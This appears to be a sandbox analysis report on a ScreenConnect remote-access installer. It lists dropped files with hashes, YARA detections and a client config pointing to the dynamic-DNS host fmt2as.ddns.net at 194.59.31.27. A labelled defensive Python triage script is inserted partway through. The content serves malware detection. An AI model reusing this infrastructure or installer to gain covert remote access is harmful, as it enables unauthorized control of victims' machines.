                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13361152
                                                                                                                                        Entropy (8bit):7.96791577882768
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:196608:/Wh0cGw1Wh0cGrWh0cG4Wh0cGYWh0cGFWh0cG6Wh0cGv:/WacjWaciWacnWacvWac4WacpWac+
                                                                                                                                        MD5:79C8B7ACB3CBBA8B53E909DF0398C465
                                                                                                                                        SHA1:A9A70E43426EAF014ED2BA59357793DC93FDDA6D
                                                                                                                                        SHA-256:DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5
                                                                                                                                        SHA-512:E62494ED2B277F46960BF8A591B03D3E547C5930D11287DCC0B7A4B7C39E847BE7B386B6F5BE82E845FD47A699D6D07C5B2323DDE91D43D80205F233789CFAED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
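Added example, not part of the Joe Sandbox report or of ScreenConnect: the script below reproduces two of the per-file fields listed above, the "Entropy (8bit)" value and the MD5/SHA1/SHA-256/SHA-512 digests, and matches a file's SHA-256 against a small IOC table transcribed from these entries (the MSI, the 207360-byte DLL and MSI8185.tmp). The entropy bands, the `SAMPLE_CDF` bytes and the helper names are this example's own assumptions; only the hash values and file descriptions in `REPORT_SHA256` come from the report.

```python
"""Reproduce the report's 'Entropy (8bit)' and hash fields for a dropped file
and look the SHA-256 up in an IOC table copied from the report.

Added example; not part of the Joe Sandbox report.  The sample input is
constructed (a tiny OLE/CDF header with zero padding), so the real report
hashes below act only as lookup keys.
"""
import hashlib
import math
from collections import Counter

# SHA-256 values copied from the dropped-file entries above (real IOCs).
REPORT_SHA256 = {
    "DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5":
        "MSI Installer, Author: ScreenConnect Software, 13361152 bytes",
    "3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852":
        "PE32 DLL dropped by msiexec.exe, 207360 bytes",
    "E5D59B8C347F264FED6155014EF3AC910E98FC15E3B0EF449FE9E9A97A9F3B0F":
        "C:\\Windows\\Installer\\MSI8185.tmp (YARA: JoeSecurity_ScreenConnectTool)",
}

# OLE/CDF (MSI, .ipi) magic and the minor-version bytes that show up as the
# lone '>' in the report's Preview column.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# Constructed sample input standing in for the sparse 20480-byte
# 'Cannot read section info' files listed by the report.
SAMPLE_CDF = OLE_MAGIC + b"\x00" * 16 + b"\x3E\x00\x03\x00\xFE\xFF\x09\x00" + b"\x00" * 480


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """The same digest set the report lists per file, upper-case hex as printed there."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def classify_entropy(h: float) -> str:
    """Rule-of-thumb bands; the thresholds are this example's assumption, not Joe Sandbox's."""
    if h < 1.0:
        return "mostly padding/zeros"
    if h < 7.0:
        return "plain code/text"
    if h < 7.9:
        return "partly compressed or packed"
    return "compressed or encrypted payload"


def triage(data: bytes) -> dict:
    """Per-file record in the shape of the report's dropped-file entries."""
    d = hashes(data)
    h = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": round(h, 6),
        "entropy_class": classify_entropy(h),
        "hashes": d,
        "report_match": REPORT_SHA256.get(d["SHA-256"]),  # None when not an IOC
        "is_ole_cdf": data[:8] == OLE_MAGIC,
        "is_pe": data[:2] == b"MZ",
    }


if __name__ == "__main__":
    import sys
    # Pass a dropped file's path to check a real sample; otherwise use the constructed one.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CDF
    for k, v in triage(data).items():
        print(f"{k}: {v}")
```

Read against the entries above: the 13361152-byte MSI scores 7.968 yet is flagged "Encrypted: false", which is what a WiX-built MSI carrying a compressed embedded cabinet looks like, while the 20480-byte Composite Document files at 1.17 and 1.82 are mostly zero-filled sectors. The SHA-256 lookup is the check to run on any `ScreenConnect.ClientSetup.msi` or `MSI*.tmp` recovered from a host before treating it as the same build the sandbox saw.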
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):423912
                                                                                                                                        Entropy (8bit):6.577203304409959
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:cuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv6:cuH2anwohwQUv5uH2anwohwQUv6
                                                                                                                                        MD5:CBA45777B73852CBCFB875058967CE55
                                                                                                                                        SHA1:5357699FE8B7F408C751083BE62074FCF99F8898
                                                                                                                                        SHA-256:E5D59B8C347F264FED6155014EF3AC910E98FC15E3B0EF449FE9E9A97A9F3B0F
                                                                                                                                        SHA-512:7F42EBA5AF0590A547605D757C05E485D4C8D6223C601866ACED3797CDD6548C4A40C8D0E5A6A217D85057BD9F2AFA341C178B6922944D7AC88F15D8ABB260C7
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI8185.tmp, Author: Joe Security
                                                                                                                                        Preview:...@IXOS.@.....@.p.Y.@.....@.....@.....@.....@.....@......&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}'.ScreenConnect Client (a9232c38f7080cfd)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a9232c38f7080cfd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{0ED93A37-D914-4786-4DE4-5166DDDFF5DB}^.C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{AD71803F-3650-93C2-8A8A-F94B61FB08A9}f.C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{DEF0A81D-558D-FB7C-4CE8-CE27F564707C}c.C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileMa
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):207360
                                                                                                                                        Entropy (8bit):6.573348437503042
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):207360
                                                                                                                                        Entropy (8bit):6.573348437503042
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.1723024039187027
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:JSbX72Fj0AGiLIlHVRpIh/7777777777777777777777777vDHFXKrTMRXw7rl0G:J+QI5w9BF
                                                                                                                                        MD5:5CFBCC753AF3D5D6BAE53E34F9D5A047
                                                                                                                                        SHA1:2E1B765081EB368D0F313FC8E611D605C1807D3D
                                                                                                                                        SHA-256:B9E4FA02F8BA96C59908D53E271276545678FEF5814A5DFAD43FEAB31014917A
                                                                                                                                        SHA-512:75EE2217785F78200F73046AC570114E1AA33328A4DBCA6F0AD3BEF8C15D26FFBD48D64DA3B514378BAF1CF5270E5875F95B39893E8BA85C9268D474E275E697
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.8151583891155803
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:g8Ph6uRc06WXzInT5FBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDN:Ph61tnTkXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:07D29C1947FF3E2DD7D61BF4797CFC62
                                                                                                                                        SHA1:C4CDEA356ECA999578B01A911F0A1953D7C63ADD
                                                                                                                                        SHA-256:7E4ECEA6A6394B421194CCE966FAB700B7DC56C446C4CEF9847FB67FD68C19B4
                                                                                                                                        SHA-512:21676B7630C019A058383B9F8D1E6337D88229BB9D5943704FC375CBA3EF02203C5EEBDE6CBCE7E0427D9ED1E42FB2BFB06F58E99375794693701591C8B398CF
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
Category:dropped
Size (bytes):435
Entropy (8bit):5.289734780210945
Encrypted:false
SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):403156
Entropy (8bit):5.359653712154593
Encrypted:false
SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauJ:zTtbmkExhMJCIpEgjxQsuk
MD5:F90A934C20177876F8EAFF0513965ACC
SHA1:18F78242CB261F8DFEB3CD2ECB8690C704DBF53D
SHA-256:FC8E1D079CCC890C8C14A5FD53F24D87B87ECF630E5B1C0AFA2100484D4E2F2E
SHA-512:F3022F74896B3E6321B6F8B1FA6EA3EDA44F77E7D9C29308EA654D1DDA0AA4E2538889663F86222EEEFF700FE6D6028EA4183371326C8BEC70C24ACFEA6C5B35
Malicious:false
Preview:
  To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113
  12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo
  12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1
  12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3
  12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed
  12/07/2019 14:54:22.490 [

Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):2464
Entropy (8bit):3.2430149748564747
Encrypted:false
SSDEEP:24:QOaqdmuF3rl2V+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVN:FaqdF7YV+AAHdKoqKFxcxkF+P
MD5:0E5B2ABC490009678927FF54EC7381E5
SHA1:0AC53C2521E9CF8E5B3D4E07907BDA852101A201
SHA-256:BEC608349C68513EE8001C089DD1DF797C2AB64CCAFAEB8B0F49D14B29A00B25
SHA-512:B8A278549742ABA1B322293699B66B9C453386179CCB066E1B47705D8230EEFE6DAC4E43C31D0BF1C29B34C9190BB9813021964B4D9E6737E64F52940699E30D
Malicious:false
Preview:
  -------------------------------------------------------------------------------------
  MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
   Start Time: Wed Dec 04 2024 14:06:51

  MpEnsureProcessMitigationPolicy: hr = 0x1
  WDEnable
  *********************************** WSC State Info *************************
  *********************************** AntiVirusProduct *************************
  displayName = [Windows Defender]
  pathToSignedProductExe = [windowsd

Process:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:modified
Size (bytes):559
Entropy (8bit):5.034446775033166
Encrypted:false
SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOUdkQkRLa/vXbAa3xT:2dL9hK6E46YPrQjvH
MD5:6260C462A02FAF6DC7F67AB035FCC56C
SHA1:B3C6CBC7F5FD4056DE464BFDEB93CDEF50E5560F
SHA-256:85C99094D71919023467E5FB3CE56F8D5E31320957CA92EA612BF12059D051D5
SHA-512:D8D91A9F660B6EF2D7911ED4B23EA0EB4A02836EFE883EAB1D55399A3E01F7762465A055E7DD96CAB83D25FC53F1EED0E8DA846D2DBF070E45AE6D91B591C355
Malicious:false
Preview:
  <?xml version="1.0" encoding="utf-8"?>
  <configuration>
    <configSections>
      <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
    </configSections>
    <ScreenConnect.ApplicationSettings>
      <setting name="HostToAddressMap" serializeAs="String">
        <value>fmt2as.ddns.net=194.59.31.27-04%2f12%2f2024%2019%3a05%3a36</value>
      </setting>
    </ScreenConnect.ApplicationSettings>
  </configuration>

Process:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):559
Entropy (8bit):5.034446775033166
Encrypted:false
SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOUdkQkRLa/vXbAa3xT:2dL9hK6E46YPrQjvH
MD5:6260C462A02FAF6DC7F67AB035FCC56C
SHA1:B3C6CBC7F5FD4056DE464BFDEB93CDEF50E5560F
SHA-256:85C99094D71919023467E5FB3CE56F8D5E31320957CA92EA612BF12059D051D5
SHA-512:D8D91A9F660B6EF2D7911ED4B23EA0EB4A02836EFE883EAB1D55399A3E01F7762465A055E7DD96CAB83D25FC53F1EED0E8DA846D2DBF070E45AE6D91B591C355
Malicious:false
Preview:
  <?xml version="1.0" encoding="utf-8"?>
  <configuration>
    <configSections>
      <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
    </configSections>
    <ScreenConnect.ApplicationSettings>
      <setting name="HostToAddressMap" serializeAs="String">
        <value>fmt2as.ddns.net=194.59.31.27-04%2f12%2f2024%2019%3a05%3a36</value>
      </setting>
    </ScreenConnect.ApplicationSettings>
  </configuration>

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.8151583891155803
Encrypted:false
SSDEEP:48:g8Ph6uRc06WXzInT5FBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDN:Ph61tnTkXpgffvdArNgfEgWB6QD
MD5:07D29C1947FF3E2DD7D61BF4797CFC62
SHA1:C4CDEA356ECA999578B01A911F0A1953D7C63ADD
SHA-256:7E4ECEA6A6394B421194CCE966FAB700B7DC56C446C4CEF9847FB67FD68C19B4
SHA-512:21676B7630C019A058383B9F8D1E6337D88229BB9D5943704FC375CBA3EF02203C5EEBDE6CBCE7E0427D9ED1E42FB2BFB06F58E99375794693701591C8B398CF
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF22578DDE847BC16D.TMP, Author: Joe Security

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):69632
Entropy (8bit):0.24033698600609024
Encrypted:false
SSDEEP:48:PDhNNJDBAduHFS3qcq56AduHFSif+YdAL3NgnEsEd+/WZSrD1mX:PDZFxpgffvdArNgfEgWK
MD5:E2B21C53C709D91D369658A89322BAEE
SHA1:D51683832B0FAD0CDC0551457E7D13B4CF7608E1
SHA-256:C8DF37900E906DDA3D64BEF7626CF37398A540D015C17BDA1E481F575D9CC2B7
SHA-512:BB049F31AE50FA36D434DB48312F237176A491F2AA782F8AE63BC24905302E873518EE99E553F38AF0B67EF22383D52E70A1E0CF51177A4E59C619C00DD5D0B0
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF541DFE2B6D389D3F.TMP, Author: Joe Security
Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 32768
Entropy (8bit): 1.431374962432589
Encrypted: false
SSDEEP: 48:ApSucvh8FXzvT5aUNBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDqW:ASERToLXpgffvdArNgfEgWB6QD
MD5: 5D176C12CB093D1BF60DBFAE9CDF480C
SHA1: A4C3A7146BA46820DB083F873CA3A816E3C7EE13
SHA-256: 28DDF3DB0729C06FCD71C4174C0EEC28B5F12970CC262C7BCD530477B0190643
SHA-512: B54B7C9A52332ED8AB11021D9EEE78B779AAD3FDA8B4314224811665055C955AD0FFFCE2AB9AB329E1DB7C0B4C58BE0A7F89B4B2F27C0B74BCAA1BFE0E720B48
Malicious: false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMP, Author: Joe Security
Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 20480
Entropy (8bit): 1.8151583891155803
Encrypted: false
SSDEEP: 48:g8Ph6uRc06WXzInT5FBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDN:Ph61tnTkXpgffvdArNgfEgWB6QD
MD5: 07D29C1947FF3E2DD7D61BF4797CFC62
SHA1: C4CDEA356ECA999578B01A911F0A1953D7C63ADD
SHA-256: 7E4ECEA6A6394B421194CCE966FAB700B7DC56C446C4CEF9847FB67FD68C19B4
SHA-512: 21676B7630C019A058383B9F8D1E6337D88229BB9D5943704FC375CBA3EF02203C5EEBDE6CBCE7E0427D9ED1E42FB2BFB06F58E99375794693701591C8B398CF
Malicious: false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMP, Author: Joe Security
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.07757015492825638
Encrypted: false
SSDEEP: 6:2/9LG7iVCnLG7iVrKOzPLHKOXKrjfMRXVSKChiVky6l51:2F0i8n0itFzDHFXKrTMRXw7r
MD5: 294E31DF28DF3EA2FE223FA66B001163
SHA1: 207A3C465F58430B3DAB732C26D86658A7742129
SHA-256: 3FE1479149FF7065E92C0DDFF65A0067C3328247381590201535C6793CBE89B1
SHA-512: BF5C0E50A3B5F594EA86F65DDB501D36A915D4A91A8C31AC57CBDB55D67CF3B1242275B0F5D9A2160B6546D6C610C1378FF457F10A3FAB97C33A5F1B08F92B7D
Malicious: false
Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 32768
Entropy (8bit): 1.431374962432589
Encrypted: false
SSDEEP: 48:ApSucvh8FXzvT5aUNBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDqW:ASERToLXpgffvdArNgfEgWB6QD
MD5: 5D176C12CB093D1BF60DBFAE9CDF480C
SHA1: A4C3A7146BA46820DB083F873CA3A816E3C7EE13
SHA-256: 28DDF3DB0729C06FCD71C4174C0EEC28B5F12970CC262C7BCD530477B0190643
SHA-512: B54B7C9A52332ED8AB11021D9EEE78B779AAD3FDA8B4314224811665055C955AD0FFFCE2AB9AB329E1DB7C0B4C58BE0A7F89B4B2F27C0B74BCAA1BFE0E720B48
Malicious: false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFB36FFE6B04D3445D.TMP, Author: Joe Security
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 32768
Entropy (8bit): 1.431374962432589
Encrypted: false
SSDEEP: 48:ApSucvh8FXzvT5aUNBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDqW:ASERToLXpgffvdArNgfEgWB6QD
MD5: 5D176C12CB093D1BF60DBFAE9CDF480C
SHA1: A4C3A7146BA46820DB083F873CA3A816E3C7EE13
SHA-256: 28DDF3DB0729C06FCD71C4174C0EEC28B5F12970CC262C7BCD530477B0190643
SHA-512: B54B7C9A52332ED8AB11021D9EEE78B779AAD3FDA8B4314224811665055C955AD0FFFCE2AB9AB329E1DB7C0B4C58BE0A7F89B4B2F27C0B74BCAA1BFE0E720B48
Malicious: false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD73F95F8E305E1F6.TMP, Author: Joe Security
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
